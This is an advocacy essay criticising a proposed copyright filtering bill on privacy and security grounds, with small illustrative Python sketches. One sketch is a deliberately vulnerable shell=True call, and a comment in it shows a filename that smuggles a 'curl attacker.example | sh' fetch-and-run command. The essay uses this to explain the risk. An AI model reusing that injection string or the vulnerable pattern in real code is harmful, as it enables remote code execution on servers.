The Filtering Powers Bill is a privacy and security mess


Among its many other problems, the Technology Copyright Enhancement Act would mandate a range of filtering technologies that online service providers must “accommodate.” That mandate is so broad, so ill-conceived, and so technically flawed that it will inevitably create serious privacy and security risks.

Since 1998, the Digital Millennium Copyright Act (DMCA) has required services to accommodate “standard technical measures” (STMs) to reduce infringement. The DMCA’s definition of STMs requires that they be developed by broad consensus in an open, fair, multi-industry and, perhaps most importantly, voluntary process. In other words, the current law reflects an understanding that most technologies should not become standards, because standards affect many, many stakeholders, all of whom deserve a say.

But the filtering powers bill is clearly designed to undermine these carefully balanced provisions of the DMCA. It changes the definition of standard technical measures so that technologies supported by only a small number of rights holders and technology companies can qualify.

It also adds a new category of filters called “designated technical measures” (DTMs), which online services must “accommodate.” “Accommodate” is defined broadly, as “adapting, implementing, integrating, adjusting, and conforming” to a designated technical measure. Failure to do so could mean losing the DMCA’s safe harbor and thus risking devastating liability for the actions of your users.

The Copyright Office will be responsible for designating these measures. Anyone can petition for such a designation, including companies that produce these technologies and want to guarantee themselves a market for them.

The sheer number of potential petitions will put enormous pressure on the Copyright Office, which exists to register copyrights, not to evaluate technology. It will put even more pressure on the people who have Internet users’ rights at heart (independent creators, technologists, and civil society) to oppose the petitions and document the dangers they pose. Those dangers are all too likely, given how much technology the new rules would require services to “accommodate.”

Mandating this “accommodation” would jeopardize security

The filtering powers bill allows the Copyright Office to mandate “accommodation” of both specific technologies and general categories of technology. That raises a number of security problems.

There’s a reason standardization is a long, deliberate process: the point is to find all the potential problems before demanding a technology across the board. Requiring untested, unvetted technologies to be widely deployed would be a security disaster.

Consider a piece of software designed to scan uploaded content for copyrighted works. Even leaving aside the question of fair use, the text of the bill places no requirements on a developer’s security expertise. In large companies, third-party software is usually thoroughly vetted by an internal security team before being integrated into the software stack. A law, especially one requiring only minimal Copyright Office approval, should not be able to bypass those checks, and it certainly should not impose such software on companies that lack the resources to vet it themselves. Poorly implemented software leaves security vulnerabilities that malicious hackers can exploit to steal the personal information of a service’s users.
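To make that concrete, here is a minimal sketch, in Python, of the kind of third-party filter integration a service might be forced to accommodate. Everything in it is invented for illustration (the fingerprint set, the function names, the exact-match design); no real bill text or vendor API specifies any of this.

```python
import hashlib

# Hypothetical sketch: a vendor-supplied blocklist of fingerprints of
# copyrighted works. A real filter would use fuzzy media matching inside
# a large, opaque component; a hash set keeps the toy model simple.
VENDOR_FINGERPRINTS = {
    hashlib.sha256(b"some copyrighted work").hexdigest(),
}

def fingerprint(content: bytes) -> str:
    """Naive exact-match fingerprint of an upload."""
    return hashlib.sha256(content).hexdigest()

def scan_upload(content: bytes) -> bool:
    """Return True if the upload matches a vendor fingerprint.

    In a mandated deployment this call sits in the hot path of every
    upload, so any bug in the vendor's code sees every user's data.
    """
    return fingerprint(content) in VENDOR_FINGERPRINTS
```

The location of that call is the whole problem: the vendor’s code, vetted or not, ends up touching everything every user submits.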

Security is hard. Bugs that lead to database breaches happen all the time, even when teams do their best to be safe; who among us hasn’t been offered free credit monitoring after some breach? Under this bill, what incentive does a content-matching technology company have to invest time and money in building secure software? The Copyright Office is not going to check for buffer overflows. And what happens when a critical vulnerability is discovered after the software has been approved and widely adopted? Services would have to choose between shutting the measure off, forfeiting DMCA protection and risking ruinous liability, or leaving their users exposed to the bug. In that scenario no one wins, and users lose the most.
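As one hypothetical example of a bug that a designation proceeding would never catch but a routine security review would, consider this deliberately vulnerable Python sketch. The vendor-scanner binary and the whole scenario are invented:

```python
import subprocess

def scan_file_insecure(user_filename: str) -> int:
    # BUG: shell=True with unsanitized, user-controlled input. A "filename"
    # like:  song.mp3; curl https://attacker.example/x | sh
    # would run arbitrary commands on the server.
    return subprocess.call(f"vendor-scanner {user_filename}", shell=True)

def scan_file_safer(user_filename: str) -> int:
    # Passing an argument list avoids shell interpretation entirely.
    return subprocess.call(["vendor-scanner", user_filename])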

“Accommodation” will also compromise privacy

Similar concerns arise with respect to privacy. It’s bad enough that potential bugs could leak user data, but this bill also leaves the door open to direct collection of user data. A DTM could include software that, upon detecting a potential infringement, collects personal data about the user of the service and sends it directly to an outside party for verification. The scale of such data collection would dwarf the Cambridge Analytica scandal, because it would be required of all services, for all of their users. It’s easy to imagine how such a feature would be a dream for law enforcement (a direct way to identify and contact alleged infringers, without any action by the service provider) and a nightmare for users’ privacy.
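Here is a hedged Python sketch of the data flow the bill leaves open. The endpoint, field names, and function are all invented for illustration, not drawn from the bill or any real measure:

```python
import json
import urllib.request

def report_match(user_id: str, ip_addr: str, content_id: str) -> None:
    """Hypothetical DTM behavior: on a suspected match, send identifying
    user data straight to an outside rightsholder for 'verification'."""
    payload = json.dumps({
        "user": user_id,      # who uploaded
        "ip": ip_addr,        # where from
        "work": content_id,   # what allegedly matched
    }).encode()
    req = urllib.request.Request(
        "https://verification.example/report",  # invented third-party endpoint
        data=payload,
        headers={"Content-Type": "application/json"},
    )
    urllib.request.urlopen(req)  # user data leaves the service entirely
```

Once that request fires, the service provider is no longer in the loop: the user’s identity has gone directly to a third party.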

Even a technology that collects information only when it detects the use of copyrighted media on a service would be disastrous for privacy. The bill places no restrictions on which content-sharing channels fall under these provisions. Content posted for public viewing is one thing, but providers could be forced to apply scanning technology to all content that crosses the platform, even content sent only in private messages. Worse, the bill could be used to require platforms to scan the contents of encrypted messages between users, which would fundamentally break the promise of end-to-end encryption. If someone sends a message to a friend, but scanning software reports on it to the service or even directly to a media company, it is simply not end-to-end encrypted. Even in the best case, assuming the software works exactly as intended, it is impossible to require it for all service activity and still allow end-to-end encryption: if information about the contents of a message can leak, the message cannot be considered encrypted. In practice, such leaks would happen regularly, even for fair uses, because a human would likely need to view the flagged content.
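A toy model in Python makes the point. This is not any real messaging protocol, and the one-time pad merely stands in for a sound end-to-end encryption scheme; the detail that matters is that the scan verdict is computed from the plaintext.

```python
import hashlib
import os

def encrypt(plaintext: bytes, key: bytes) -> bytes:
    """Stand-in for a sound E2EE scheme (a one-time pad for this toy model)."""
    assert len(key) >= len(plaintext)
    return bytes(p ^ k for p, k in zip(plaintext, key))

# Hashes of "known" copyrighted clips the client-side scanner flags.
FLAGGED = {hashlib.sha256(b"copyrighted clip").hexdigest()}

def send(plaintext: bytes) -> dict:
    key = os.urandom(len(plaintext))  # shared only with the recipient
    ciphertext = encrypt(plaintext, key)
    flagged = hashlib.sha256(plaintext).hexdigest() in FLAGGED
    # The server relays both fields. The ciphertext reveals nothing, but
    # "flagged" is computed from the plaintext, so the channel is no
    # longer end-to-end: content information leaks with every message.
    return {"ciphertext": ciphertext, "flagged": flagged}
```

Whether the verdict is a single bit or a full report, anything derived from the plaintext and visible off-device contradicts the end-to-end guarantee.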

The Copyright Office is supposed to “consider” a technology’s impact on data privacy and security, but it is not required to prioritize them over the myriad other factors it must also “consider.” Moreover, assessing privacy and security requires a level of technical expertise beyond the Office’s current remit. If a company claims its technology is secure, and no independent technologist disputes the claim, the Copyright Office may simply accept it. A company has every incentive to define “secure” and “private” in ways that let it claim its product complies; a user or a security professional may define them quite differently. Companies also have little incentive to disclose exactly how their technology does what it claims to do, making it difficult to assess the security and privacy problems it might cause. Again, the burden falls on outside experts to monitor the Copyright Office’s proceedings and weigh in on behalf of the millions of people who use the Internet.

This bill is a disaster. Ultimately, it would force every online service to choose between accommodating whatever technologies the Copyright Office designates and risking hundreds of thousands of dollars in liability to rights holders, while jeopardizing the privacy and security of its users. We all have a right to free expression, and we shouldn’t have to sacrifice privacy and security when we rely on platforms to exercise that right online.
